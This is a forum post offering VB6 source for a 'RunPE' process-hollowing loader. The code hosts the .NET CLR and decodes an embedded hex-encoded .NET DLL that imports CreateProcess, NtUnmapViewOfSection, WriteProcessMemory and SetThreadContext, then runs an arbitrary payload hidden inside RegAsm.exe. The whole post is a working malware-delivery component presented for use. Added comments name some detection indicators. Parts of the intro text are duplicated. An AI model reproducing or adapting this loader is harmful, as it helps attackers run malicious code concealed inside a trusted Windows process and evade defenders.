VB6 CLR RunPE x86 / Native & .NET
Publicado: 23 Nov 2019, 20:28
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]Hello friends[/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]I took C# RunPE to import it into your favorite VB6 with the help of Common Language Runtime[/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]So let's get started[/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]For this RunPE to work the target needs the .NET Framework 2.0 runtime (v2.0.50727), and the VB6 project needs two type libraries added under Project → References:[/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]Note that this does not depend on the target having installed anything extra: the .NET Framework ships as part of Windows. Caveat: on Windows 8 and later the v2.0.50727 runtime belongs to the optional ".NET Framework 3.5" feature and is not necessarily enabled, so the hard-coded v2.0.50727 paths below should be checked on the target.[/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]Now you can use this RunPE[/font][/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif][font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif][font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]Let me tell you about the parameters[/font]
[/font][/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]You can pass arguments to the process[/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]By default the payload is run inside "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"; any other executable from that directory (for example MSBuild.exe) can be named instead. Only the file name is passed to Load; the embedded assembly's string table contains "WinDir" and "\Microsoft.NET\Framework\v2.0.50727\", so it most likely builds the full path itself. Because this is the 32-bit Framework directory (not Framework64), the hollowed host is a 32-bit process, matching the "x86" in the title.[/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif][font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif][font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]I hope that you would understand everything, now I wish you good luck [/font]
[/font][/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]I took C# RunPE to import it into your favorite VB6 with the help of Common Language Runtime[/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]So let's get started[/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]For this RunPE to work the target needs the .NET Framework 2.0 runtime (v2.0.50727), and the VB6 project needs two type libraries added under Project → References:[/font]
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.tlb
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]Now you can use this RunPE[/font][/font]
'''''''' RunPE .net CLR '''''''''
'''''''' By MR. MORFEY ''''''''''
''' My Telegram: M0RF3Y0x1337 '''
' DispCallFunc (oleaut32): generic stdcall invoker used below to call a raw
' vtable slot on a COM interface pointer. pv = object pointer, ov = byte offset
' of the slot in the vtable, cc = calling convention, vr = return VARTYPE,
' ca = argument count, pr/pg = per-argument VARTYPE tags and VARIANT pointers,
' par = receives the return value.
Private Declare Function DispCallFunc Lib "oleaut32" (ByVal pv As Long, ByVal ov As Long, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As Long, ByRef par As Variant) As Long
' RtlMoveMemory (kernel32): raw memcpy. Both pointer arguments are "As Any",
' so the call site decides whether a variable's address (ByRef) or its value
' (ByVal) is passed — this is what lets the code below read the SAFEARRAY
' pointer out of a Byte array and stuff an interface pointer into an object
' variable without any AddRef.
Private Declare Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As Long)
' VarPtrArray: msvbvm60's VarPtr applied to an array variable; returns the
' address of the variable's SAFEARRAY* (the descriptor pointer), not of the data.
Private Declare Function VarPtrArray Lib "msvbvm60" Alias "VarPtr" (ByRef Ptr() As Any) As Long
' RunPE: hosts the .NET 2.0 CLR inside the calling (unmanaged, VB6) process,
' loads an embedded .NET DLL from the hex string below into the default
' AppDomain, and calls its RunPE.Load(hostExeName, Arg, PayLoad).
'
' Arg      command line handed to the hollowed host process.
' PayLoad  raw bytes of the PE image to run inside the host.
' Returns  nothing (the function has no return type and never assigns RunPE);
'          failures surface as VB runtime errors since there is no On Error.
'
' What the embedded DLL is (readable straight from the hex): an MZ/PE file with
' a .NET metadata header ("BSJB", runtime string "v2.0.50727"), a single type
' "RunPE" with a "Load" method, P/Invoke imports of CreateProcess,
' NtUnmapViewOfSection, VirtualAllocEx, ReadProcessMemory, WriteProcessMemory,
' [Wow64]GetThreadContext, [Wow64]SetThreadContext, ResumeThread, plus
' GetProcessById/Kill and GetEnvironmentVariable with the strings "WinDir" and
' "\Microsoft.NET\Framework\v2.0.50727\". A DotfuscatorAttribute and the PDB
' path "D:\Class\bin\Debug\Dotfuscated\Class.pdb" are also present.
' That import set is the classic process-hollowing (RunPE) sequence; the exact
' control flow of Load is not visible here and is not documented as fact.
'
' NOTE(defense): the observable chain is a VB6 process that loads mscoree.dll
' via CorRuntimeHost, then spawns RegAsm.exe (or another v2.0.50727 binary)
' whose mapped image is replaced. Both the MSXML bin.hex decode of a long hex
' literal and the DispCallFunc-on-vtable-offset pattern are static indicators.
Public Function RunPE(Arg As String, PayLoad() As Byte)
' Start the CLR in-process and obtain the default AppDomain (mscoree.tlb / mscorlib.tlb).
Dim host As New mscoree.CorRuntimeHost, dom As AppDomain
host.Start
host.GetDefaultDomain dom
' MSXML element with dataType "bin.hex": assigning hex text to .Text and
' reading .NodeTypedValue yields the decoded Byte array (see after the blob).
' DM, EL and ShellCode are never declared (no Option Explicit visible), so
' they are implicit Variants.
Set DM = CreateObject("Microsoft.XMLDOM")
Set EL = DM.createElement("tmp")
EL.DataType = "bin.hex"
Dim bytes() As Byte
' Hex of the embedded .NET DLL (starts "4D5A" = "MZ"); see header comment.
ShellCode = ShellCode & "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000005045"
ShellCode = ShellCode & "00004C010300997BD95D0000000000000000E00022210B010B000014000000060000000000008E32000000200000000000000000400000200000000200000400000000000000040000000000000000800000000200000000000003004085000010000010000000001000001000000000000010000000000000000000000034320000"
ShellCode = ShellCode & "57000000004000005803000000000000000000000000000000000000006000000C000000D43100001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000941200000020"
ShellCode = ShellCode & "00000014000000020000000000000000000000000000200000602E7273726300000058030000004000000004000000160000000000000000000000000000400000402E72656C6F6300000C0000000060000000020000001A000000000000000000000000000040000042000000000000000000000000000000007032000000000000"
ShellCode = ShellCode & "4800000002000500EC230000E80D000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001330020015000000000000000225280100000A037D0100000402047D020000042A000000133001000700000000000000027B010000042A001330"
ShellCode = ShellCode & "01000700000000000000027B020000042A7E7201000070280500000A720F00007003280600000A040517280F000006262A00133004001B00000001000011170A2B110203040528100000062C02172A0617580A061B31EB162A001B300A00D502000002000011160A725900007002280700000A0B1202FE15050000021203FE150400"
ShellCode = ShellCode & "00021202D005000002280800000A280900000A280A00000A7D0700000403280B00000A2D0D07726700007003280600000A0B02077E0C00000A7E0C00000A1620040000087E0C00000A141202120328040000062D06730D00000A7A041F3C280E00000A13040411041F3458280E00000A130520B30000008D11000001130611061620"
ShellCode = ShellCode & "020001009E280F00000A1A3315097B04000004110628050000062D1B730D00000A7A097B04000004110628060000062D06730D00000A7A11061F29941307161308097B0300000411071E5812081A120028090000062D06730D00000A7A110511083315097B030000041108280B0000062C06730D00000A7A0411041F5058280E0000"
ShellCode = ShellCode & "0A13090411041F5458280E00000A130A16130B097B030000041105110920003000001F40280C000006130C052D1E110C2D1A17130B097B0300000416110920003000001F40280C000006130C110C2D06730D00000A7A097B03000004110C04110A1200280A0000062D06730D00000A7A110420F800000058130D0411041C58281000"
ShellCode = ShellCode & "000A130E1613112B7004110D1F0C58280E00000A131204110D1F1058280E00000A131304110D1F1458280E00000A131411132C3811138D12000001131504111411151611158E69281100000A097B03000004110C111258111511158E691200280A0000062D06730D00000A7A110D1F2858130D1111175813111111110E328A110C28"
ShellCode = ShellCode & "1200000A130F097B0300000411071E58110F1A1200280A0000062D06730D00000A7A0411041F2858280E00000A1310110B2C041105130C11061F2C110C1110589E280F00000A1A3315097B04000004110628070000062D1B730D00000A7A097B04000004110628080000062D06730D00000A7A097B04000004280D00000615330673"
ShellCode = ShellCode & "0D00000A7ADE2326097B05000004281300000A281400000A131611162C0711166F1500000A161317DE02172A11172A000000411C0000000000003900000074020000AD02000023000000050000011E02281600000A2A42534A4201000100000000000C00000076322E302E35303732370000000005006C0000002C060000237E0000"
ShellCode = ShellCode & "98060000D004000023537472696E677300000000680B00006C00000023555300D40B0000100000002347554944000000E40B00000402000023426C6F62000000000000000200000057B5A2150902000000FA01330016C4000100000022000000050000000F0000001100000031000000220000001A00000001000000020000000200"
ShellCode = ShellCode & "0000010000000200000002000000020000000A0000000100000002000000020000000000E80201000000000006009002F70206002A016C030600FE00F7020600DF03F7020600FE03F70206006902AF0406000504F7020600B302F7020A00D70359030600EB00F7020600BD00F7020600C9026C0306001104F70206005203F7020600"
ShellCode = ShellCode & "2503F70206003F03F70206001A00F70206009A02F70206003803F70206007A04F7020600E100F7020600DE018B0306004B028B0306003E0113030600FE0113030600170213030600AC01130306007001130306003202130306008D0113030600550113030600F0006C030600160159038700AB030000000000004800000000000100"
ShellCode = ShellCode & "010001011000C901000005000100010001001000550000001500030004000B011000600000005500030012000B0110006B000000550007001200010060000A00010072000D0006006000EB0006006B00EB00060072001C01060099001C01060060001C0106006B000A00060072000A00060099000A000610A8021F010600B102EB00"
ShellCode = ShellCode & "0600BE02EB000600C502EB000600C702EB0050200000000086184C0314000100742000000000860060001A000300882000000000860072001E0003000000000080009160C9034400030000000000800091602F045B000D00000000008000916019045B000F00000000008000916056045B001100000000008000916040045B001300"
ShellCode = ShellCode & "00000000800091608A046200150000000000800091609C046D001A000000000080009160FE0278001F00000000008000916067047E00210000000000800091608300870026009B20000000008600900098002700BC200000000096002F03A4002A00E4200000000091006000A4002E00E4230000000086184C031000320000000100"
ShellCode = ShellCode & "6000000002007200000001000100000002000500000003002000000004002400000005002800000006002C00000007003800000008003C0000000900400000000A0044000000010001000000020005000000010001000000020005000000010001000000020005000000010001000000020005000000010001000000020005000000"
ShellCode = ShellCode & "03002000000004002400000005002800000001000100000002000500000003002000000004002400000005002800000001000100000002000500000001000100000002000500000003002000000004002400000005002800000001000100000001006D0000000200BA0200000300760400000100C002000002009500000003005B00"
ShellCode = ShellCode & "00000400B20000000100010000000200050000000300200000000400240009004C03100011004C032A0019004C03350031004C03100039009B008C004100F00391004100F703CE005100CF00D4006100AA02DB0069000900E1004100BF04E60071003303EB0079004C03100081001200EE0071009F02F50081003000F90099008004"
ShellCode = ShellCode & "00018100BA030B016900120011014900740016014900F202100029004C031000B1004C032601B9004C031000C1004C035301C9004C035301D1004C035301D9004C035301E1004C035301E9004C035301F1004C035301F9004C03530101014C03530109014C03D5012E000B01AB012E001300A5012E0003012F002E00FB002F002E00"
ShellCode = ShellCode & "F3002F002E00EB0098012E00E3002F002E00DB0080012E00D30058012E000A0063012E00CB0058012E001301DC012E00C30034012E00BB002B0143001B003B00430013002F00800023005600A00023005600C00023005600E00023005600000123005600200123005600400123005600600123005600800123005600A00123005600"
ShellCode = ShellCode & "1600230101000000000004000100000000000500A000AD0002000100000051002200000053002600020002000300020003000500D102DE0204010900C903010000010B002F04010000010D001904010000010F00560401000001110040040100000113008A040100000115009C04010000011700FE02020000011900670401000001"
ShellCode = ShellCode & "1B0083000100048000000100000000000000000000000000C303000002000000000000000000000001006200000000000200000000000000000000000100F702000000000400030005000300000000000000000000415F3000415F3100546F55496E74333200546F496E74333200496E74333200415F3200415F3300415F3400415F"
ShellCode = ShellCode & "3500546F496E74313600415F3600415F3700415F3800415F39003C4D6F64756C653E004100430052756E504500646174610061006D73636F726C696200620070726F6300630047657450726F636573734279496400526573756D65546872656164004C6F616400636D64006400476574456E7669726F6E6D656E745661726961626C"
ShellCode = ShellCode & "6500636F6D70617469626C650052756E74696D655479706548616E646C65004765745479706546726F6D48616E646C650056616C756554797065005479706500477569644174747269627574650041747472696275746555736167654174747269627574650044656275676761626C6541747472696275746500436F6D5669736962"
ShellCode = ShellCode & "6C6541747472696275746500417373656D626C795469746C6541747472696275746500417373656D626C7954726164656D61726B41747472696275746500417373656D626C7946696C6556657273696F6E41747472696275746500417373656D626C79436F6E66696775726174696F6E41747472696275746500417373656D626C79"
ShellCode = ShellCode & "4465736372697074696F6E41747472696275746500446F746675736361746F7241747472696275746500436F6D70696C6174696F6E52656C61786174696F6E7341747472696275746500417373656D626C7950726F6475637441747472696275746500417373656D626C79436F707972696768744174747269627574650041737365"
ShellCode = ShellCode & "6D626C79436F6D70616E794174747269627574650052756E74696D65436F6D7061746962696C697479417474726962757465005375707072657373556E6D616E61676564436F64655365637572697479417474726962757465004174747269627574650042797465006765745F53697A6500650053697A654F66006600537472696E"
ShellCode = ShellCode & "67004172670067007061746800680069004D61727368616C006B65726E656C33322E646C6C006E74646C6C2E646C6C00436C6173732E646C6C004B696C6C0053797374656D004E74556E6D6170566965774F6653656374696F6E0053797374656D2E5265666C656374696F6E00457863657074696F6E0052756E005A65726F004275"
ShellCode = ShellCode & "6666657200426974436F6E766572746572002E63746F7200496E745074720053797374656D2E446961676E6F73746963730053797374656D2E52756E74696D652E496E7465726F7053657276696365730053797374656D2E52756E74696D652E436F6D70696C6572536572766963657300446562756767696E674D6F646573004765"
ShellCode = ShellCode & "74427974657300436C6173730043726561746550726F636573730050726F63657373004174747269627574655461726765747300436F6E63617400466F726D6174004F626A65637400456E7669726F6E6D656E7400436F6E7665727400576F773634476574546872656164436F6E7465787400476574546872656164436F6E746578"
ShellCode = ShellCode & "7400576F773634536574546872656164436F6E7465787400536574546872656164436F6E74657874005669727475616C416C6C6F6345780070617900417272617900426C6F636B436F7079005265616450726F636573734D656D6F727900577269746550726F636573734D656D6F72790053797374656D2E53656375726974790049"
ShellCode = ShellCode & "734E756C6C4F72456D70747900000000000D570069006E0044006900720000495C004D006900630072006F0073006F00660074002E004E00450054005C004600720061006D00650077006F0072006B005C00760032002E0030002E00350030003700320037005C00000D200022007B0030007D0022000003200000005C34360349F5"
ShellCode = ShellCode & "EE4AAE76F941D7E8422B0008B77A5C561934E08902060E02060803200001052002010E080320000E032000080328000E03280008042001010205010000000005200101111108010001000000000011000A020E0E18180209180E101114101110040100000006000202181D080A000502180810080810080A00050218081D05081008"
ShellCode = ShellCode & "05000208180808000508180808080804000108180400010E0E0600030E0E0E0E072003010E0E1D0503070108080004020E0E1D0502200718080E1114111008081D0808080808020808061D0508080808081D051225020500020E0E1C0600011229112D0500010812290400010908040001020E020618060002081D05080300000806"
ShellCode = ShellCode & "0002061D05080A000501125108125108080500011D0508040001080905000112250802060903061D05021E2404200101080801000800000000001E01000100540216577261704E6F6E457863657074696F6E5468726F777301042001010E0A010005436C61737300001C0100133030303A303A303A352E34322E302E393531340000"
ShellCode = ShellCode & "0000000017010012436F7079726967687420C2A920203230313900000C010007312E302E302E3000000501000100002901002431393661366538342D383337652D346236342D623964362D6462626132353839343764330000062001011180890801000200000000001C012D405E5F606B626D646F6B656C6B686B6A767370744142"
ShellCode = ShellCode & "43444546000000000000997BD95D000000000200000041000000F0310000F01300005253445369C8DB59B1CE1947866EE477F8F0230201000000443A5C436C6173735C62696E5C44656275675C446F7466757363617465645C436C6173732E706462000000005C32000000000000000000007E320000002000000000000000000000"
ShellCode = ShellCode & "000000000000000000000000703200000000000000000000000000000000000000005F436F72446C6C4D61696E006D73636F7265652E646C6C0000000000FF25002040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100100000001800008000000000000000000000000000000100010000003000008000000000000000000000000000000100000000004800000058400000FC0200000000000000000000"
ShellCode = ShellCode & "FC0234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00000100000001000000000000000100000000003F000000000000000400000002000000000000000000000000000000440000000100560061007200460069006C00650049006E0066006F0000000000240004000000"
ShellCode = ShellCode & "5400720061006E0073006C006100740069006F006E00000000000000B0045C020000010053007400720069006E006700460069006C00650049006E0066006F0000003802000001003000300030003000300034006200300000001A000100010043006F006D006D0065006E007400730000000000000022000100010043006F006D00"
ShellCode = ShellCode & "700061006E0079004E0061006D0065000000000000000000340006000100460069006C0065004400650073006300720069007000740069006F006E000000000043006C006100730073000000300008000100460069006C006500560065007200730069006F006E000000000031002E0030002E0030002E003000000034000A000100"
ShellCode = ShellCode & "49006E007400650072006E0061006C004E0061006D006500000043006C006100730073002E0064006C006C0000004800120001004C006500670061006C0043006F007000790072006900670068007400000043006F0070007900720069006700680074002000A90020002000320030003100390000002A00010001004C0065006700"
ShellCode = ShellCode & "61006C00540072006100640065006D00610072006B00730000000000000000003C000A0001004F0072006900670069006E0061006C00460069006C0065006E0061006D006500000043006C006100730073002E0064006C006C0000002C0006000100500072006F0064007500630074004E0061006D0065000000000043006C006100"
ShellCode = ShellCode & "730073000000340008000100500072006F006400750063007400560065007200730069006F006E00000031002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560065007200730069006F006E00000031002E0030002E0030002E003000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "0000000000000000000000000000000000000000000000000000003000000C000000903200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "000000000000000000000000000000000000"
' Decode the hex text into the Byte array via MSXML's bin.hex typed value.
EL.Text = ShellCode
bytes = EL.NodeTypedValue
' Build the argument list for a raw vtable call: two VARTYPE tags and two
' pointers to VARIANTs holding the argument values.
Dim vTypes(0 To 1) As Integer
Dim vValues(0 To 1) As Long
' pPArry = address of the array variable; the 4 bytes stored there are the
' SAFEARRAY* (pArry), which is what a .NET byte[] parameter expects here.
Dim pPArry As Long: pPArry = VarPtrArray(bytes)
Dim pArry As Long
RtlMoveMemory pArry, ByVal pPArry, 4
' Argument 0: the SAFEARRAY pointer, wrapped in a Variant. Tag 16411 = &H401B
' (VT_BYREF bit set) tells DispCallFunc how to push it.
Dim vWrap: vWrap = pArry
vValues(0) = VarPtr(vWrap)
vTypes(0) = 16411
' Argument 1: address of pRef, the out-parameter that receives the loaded
' Assembly's interface pointer. Tag 16396 = &H400C (VT_BYREF | VT_VARIANT).
Dim pRef As Long: pRef = 0
Dim vWrap2: vWrap2 = VarPtr(pRef)
vValues(1) = VarPtr(vWrap2)
vTypes(1) = 16396
' Invoke vtable slot 45 (byte offset 45*4) of the _AppDomain interface with
' CC_STDCALL (4), HRESULT (vbLong) return and 2 arguments. This is presumed to
' be the Load(byte[] rawAssembly) overload (Load_3 in mscorlib.tlb) — verify
' against the type library before relying on it. The HRESULT is discarded: if
' Load fails, pRef stays 0 and the CreateInstance line below raises
' "Object variable not set".
Call DispCallFunc(ObjPtr(dom), 45 * 4, 4, vbLong, 2, vTypes(0), vValues(0), 0)
' Copy the raw interface pointer into an object variable without AddRef;
' VB6 will Release it when aRef goes out of scope. That is balanced only if
' the out-parameter handed back an owned reference (normal COM contract) —
' NOTE(review): not verified here.
Dim aRef As mscorlib.Assembly
RtlMoveMemory aRef, pRef, 4
' Instantiate the embedded type "RunPE" and call its Load(path, args, payload).
' Only the file name "RegAsm.exe" is passed; the assembly's string table holds
' "WinDir" and "\Microsoft.NET\Framework\v2.0.50727\", so it presumably builds
' the full path from %WinDir% (not visible at this level).
aRef.CreateInstance("RunPE").Load "RegAsm.exe", Arg, PayLoad
End Function
[/font][/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]You can pass arguments to the process[/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]By default the payload is run inside "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"; any other executable from that directory (for example MSBuild.exe) can be named instead. Only the file name is passed to Load; the embedded assembly's string table contains "WinDir" and "\Microsoft.NET\Framework\v2.0.50727\", so it most likely builds the full path itself. Because this is the 32-bit Framework directory (not Framework64), the hollowed host is a 32-bit process, matching the "x86" in the title.[/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif][font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif][font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]I hope that you would understand everything, now I wish you good luck [/font]
[/font][/font]